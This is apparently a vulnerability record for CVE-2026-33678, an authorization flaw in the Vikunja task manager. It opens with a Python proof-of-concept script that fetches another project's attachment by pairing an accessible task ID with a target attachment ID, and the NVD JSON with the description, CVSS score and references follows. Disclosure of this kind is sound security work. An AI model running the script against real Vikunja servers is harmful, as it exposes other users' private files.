CVE-2026-33678

# PoC Code for CVE-2026-33678 # This script demonstrates how to download an arbitrary attachment # by exploiting the IDOR vulnerability. import requests target_url = "http://localhost:3456" access_token = "<YOUR_VALID_JWT_TOKEN>" # Attacker has access to task_id 1 (Legitimate Task) # Attacker wants to download attachment_id 100 (Target Attachment) legitimate_task_id = "1" target_attachment_id = "100" # Vulnerable endpoint endpoint = f"{target_url}/api/v1/tasks/{legitimate_task_id}/attachments/{target_attachment_id}" headers = { "Authorization": f"Bearer {access_token}", "Content-Type": "application/json" } response = requests.get(endpoint, headers=headers) if response.status_code == 200: print(f"[+] Exploit Successful! Downloaded attachment {target_attachment_id}") print(f"[+] Content-Type: {response.headers.get('Content-Type')}") # print(response.content) # Save or print binary content else: print(f"[-] Failed. Status Code: {response.status_code}") print(response.text)

{"cve": {"id": "CVE-2026-33678", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:35.270", "lastModified": "2026-03-30T13:57:13.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, `TaskAttachment.ReadOne()` queries attachments by ID only (`WHERE id = ?`), ignoring the task ID from the URL path. The permission check in `CanRead()` validates access to the task specified in the URL, but `ReadOne()` loads a different attachment that may belong to a task in another project. This allows any authenticated user to download or delete any attachment in the system by providing their own accessible task ID with a target attachment ID. Attachment IDs are sequential integers, making enumeration trivial. Version 2.2.1 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto y autoalojada. Antes de la versión 2.2.1, 'TaskAttachment.ReadOne()' consulta los adjuntos solo por ID ('WHERE id = ?'), ignorando el ID de la tarea de la ruta URL. La verificación de permisos en 'CanRead()' valida el acceso a la tarea especificada en la URL, pero 'ReadOne()' carga un adjunto diferente que puede pertenecer a una tarea en otro proyecto. Esto permite a cualquier usuario autenticado descargar o eliminar cualquier adjunto en el sistema proporcionando su propio ID de tarea accesible junto con un ID de adjunto objetivo. Los ID de los adjuntos son enteros secuenciales, lo que hace que la enumeración sea trivial. La versión 2.2.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "E8647862-9C78-473D-9FED-7AFC24335A61"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}]}}